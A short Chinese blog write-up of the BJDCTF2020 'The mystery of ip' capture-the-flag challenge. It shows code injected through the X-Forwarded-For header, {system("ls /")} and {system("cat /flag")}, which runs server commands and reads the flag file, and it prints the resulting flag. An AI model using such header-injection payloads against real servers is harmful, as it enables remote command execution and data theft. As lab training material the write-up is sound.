![[BJDCTF2020]The mystery of ip – buu刷题笔记,网络安全爱好者中心-神域博客网](https://img.godyu.com/2023/12/20231226125906603.png)
![图片[1]-[BJDCTF2020]The mystery of ip – buu刷题笔记-安全小天地](https://img.godyu.com/2023/12/20231226125906603.png?imageView2/0/format/webp/q/75)
打开,依次尝试点开三个页面,查看各自的源代码,只有一个ip有用,因为题目说的是ip,大概率和X-Forwarded-For有关,关于这个的解释,请大家移步查看这篇文章
X-Forwarded-For 和 X-Real-IP 的区别?
2022年4月13日 17:40
抓包flag界面添加X-Forwarded-For,列出根目录下的文件,我也是第一次知道X-Forwarded-For还可以这么玩,涨知识了啊
X-Forwarded-For:{system(\"ls /\")}![图片[2]-[BJDCTF2020]The mystery of ip – buu刷题笔记-安全小天地](https://img.godyu.com/2023/12/20231226205913307.png?imageView2/0/format/webp/q/75)
发现有一个flag文件,查看就行,
X-Forwarded-For:{system(\"cat /flag\")}所以flag为flag{09fd9928-b993-4411-a84b-94fa4b4545fe}
THE END
暂无评论内容